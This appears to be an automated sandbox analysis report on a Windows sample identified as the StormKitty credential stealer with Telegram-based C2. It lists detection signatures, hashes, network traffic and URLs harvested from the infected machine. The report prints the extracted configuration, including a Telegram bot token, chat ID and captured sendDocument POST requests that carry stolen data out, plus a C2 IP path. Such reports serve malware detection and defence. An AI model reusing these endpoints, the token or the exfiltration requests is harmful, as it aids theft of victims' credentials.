Windows Analysis Report
HTZ4az17lj.exe

Overview

General Information

Sample name: HTZ4az17lj.exe
renamed because original name is a hash value
Original sample name: ceb9e6829d00ad6e8f25b30d77aba83f.exe
Analysis ID: 1426719
MD5: ceb9e6829d00ad6e8f25b30d77aba83f
SHA1: 865128c3a9baee65deeab14f1fdc9a68969df6f4
SHA256: 664582c7357c0ea9f0f6ab524867e1cce887251b11e917ba5c9d81247e57bcb1
Tags: exe
Infos:

Detection

StormKitty
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected StormKitty Stealer
Yara detected Telegram RAT
.NET source code contains potential unpacker
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Cameleon, StormKitty PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: HTZ4az17lj.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Avira: detection malicious, Label: HEUR/AGEN.1313362
Found malware configuration
Source: HTZ4az17lj.exe.6044.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 21253, "from": {"id": 5444063802, "is_bot": true, "first_name": "quakerz", "username": "quakerz_bot"}, "chat": {"id": 1126217452, "first_name": "N3cro", "last_name": "M4ncer", "username": "N3croM4nc", "type": "private"}, "date": 1713270426, "document": {"file_name": "6D97C624D7.zip", "mime_type": "application/zip", "file_id": "BQACAgQAAxkDAAJTBWYebpqW0XKCOs9qCDAvOdaEpasdAALNEgACWmPwUGx3NPjDAAF9ZzQE", "file_unique_id": "AgADzRIAAlpj8FA", "file_size": 196894}}}]}
Multi AV Scanner detection for domain / URL
Source: http://128.199.113.162/XtfcshEgt/upwawsfrg.php?zd=1 Virustotal: Detection: 9% Perma Link
Source: http://128.199.113.162/XtfcshEgt/upwawsfrg.php Virustotal: Detection: 9% Perma Link
Source: http://128.199.113.162 Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Virustotal: Detection: 55% Perma Link
Multi AV Scanner detection for submitted file
Source: HTZ4az17lj.exe ReversingLabs: Detection: 44%
Source: HTZ4az17lj.exe Virustotal: Detection: 55% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: HTZ4az17lj.exe Joe Sandbox ML: detected
Source: file:///C:/Users/user/AppData/Local/Temp/p.html HTTP Parser: No favicon
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: HTZ4az17lj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY/sendDocument?chat_id=1126217452 HTTP/1.1Content-Type: multipart/form-data; boundary="b0e207a3-07fa-498b-b8fa-a48a2fe21eb9"Host: api.telegram.orgContent-Length: 197085Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.44.66 104.21.44.66
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: unknown TCP traffic detected without corresponding DNS query: 128.199.113.162
Source: global traffic HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9pAT4RKKfEeELv4&MD=nfkaylzL HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9pAT4RKKfEeELv4&MD=nfkaylzL HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /XtfcshEgt/upwawsfrg.php?zd=1 HTTP/1.1Cookie: SESSION=Gcj+h91LeJxqEAdq3hlnr5vILKnhsk514dxtp+No3JD7QBgj4catKb4KZZoEe7n0ZQHfUqB4+LRcnLZpCNm+vlRVwAlzuGF/Ogb31zT1/J+v/tG52kIlGXwrBCWsk0XIUZPNK8kN4FIXgHizyKTrvIpZz3YVByuSV3l6JFK2KVQP4VecvhvlHdWlS3UQ3xdHQ8j9KcN4s7UAumu1CgmZyH0yDEijiEEFO2qYchSihH2HLA6McZ2qghDxmjavG0Wz3soCffYWADkZqOeAv4RewsFkOlVJuf/SiScZljMLny+gsCdQWKnRqXZJPmRDp5DQsAH7VTTYRrINKSibONStNYaRZFHiK6XnbaEMnI6zUser-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0Host: 128.199.113.162
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: URL:https://www.facebook.com/<br> equals www.facebook.com (Facebook)
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: URL:https://www.facebook.com/login.php<br> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: 229.116.3.0.in-addr.arpa
Source: unknown HTTP traffic detected: POST /bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY/sendDocument?chat_id=1126217452 HTTP/1.1Content-Type: multipart/form-data; boundary="b0e207a3-07fa-498b-b8fa-a48a2fe21eb9"Host: api.telegram.orgContent-Length: 197085Expect: 100-continueConnection: Keep-Alive
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.000002568026C000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://128.199.113.162
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.00000256801F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://128.199.113.162/XtfcshEgt/upwawsfrg.php
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.000002568026C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://128.199H
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.00000295806A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://app.turboboy.co/users
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://es.scribd.com/doc/181228937/Manual-de-Ayuda-Vectric-Aspire-3-5
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://icanhazip.com
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://icanhazip.com/
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.000002568026C000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://softdepotsupport.com/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://softwaredepotdesk.com/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://www.instructables.com/id/DIY-Chess-Board/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://www.woodsmithlibrary.com/login/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://www.woodsmithshop.com/account/login/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://www.woodsmithvideoedition.com/account/login/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: http://www.woodsmithvideotips.com/home
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://account.formula1.com/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://accounts.google.com/ServiceLoginAuth
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://accounts.google.com/signin/v2/sl/pwd
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580650000.00000004.00000800.00020000.00000000.sdmp, HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY/sendDocument?chat_id=1126
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botp
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://co.pinterest.com/
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://elmejorperfume.com/checkout/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://es.pinterest.com/pin/329325791483354616/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://es.scribd.com/doc/116279436/Tabla-Conversion-Completa
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://es.scribd.com/doc/181228937/Manual-de-Ayuda-Vectric-Aspire-3-5
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://facturanet.todo1.com/CO/login_CO.aspx
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://github.com/join
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://id.tigo.com/openid/login/signup_form
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://login.live.com/login.srf
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://micorreo.telmex.com/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://portal.vectric.com/register/9W7jITU6QgSBfrIhb_0UOw
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://portal.vectric.com/registerNew
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://pse.todo1.com/PseBancolombia/control/ElectronicPayment.bancolombia
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://registration.mercadolibre.com.co/registration-buy
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://reset.vova.com/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://resultados.lch.com.co/ingresar
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://secure.totalav.com/createlogin
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://shop.site-link.com/peachtreeorder/custinfo.asp
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://support.mozilla.org
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp756C.tmp.dat.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://todoenartes.com/register
Source: p.html.0.dr String found in binary or memory: https://webmail.claro.net.co/app/s/LoginPage.asp
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://webmail.telmex.net.co/app/s/LoginPage.asp
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://woodsmithlibrary.foxycart.com/checkout
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://wsvideoedition.foxycart.com/checkout
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.amazon.com/ap/forgotpassword
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.amazon.com/ap/signin
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.banggood.com/login.html
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.buildsomething.com/sign-up
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.directv.com.co/Midirectv/home/LogIn
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.directv.com.co/midirectv/ingresar
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.dominos.com.co/pages/order/payment
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.dropbox.com/s/ppd4vfvmii0jnt8/Cam%20lever%20clamps%20for%20worksurfaces%20with%20dog%20h
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.gef.com.co/tienda/UserRegistrationForm
Source: HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.grammarly.com/signup
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.hponline.com.co/account/login
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.iclaro.com.hn/app/s/LoginPage.asp
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.incrementaltools.com/one-page-checkout.asp
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.instagram.com/accounts/signup/
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr String found in binary or memory: https://www.instructables.com/id/DIY-Chess-Board/
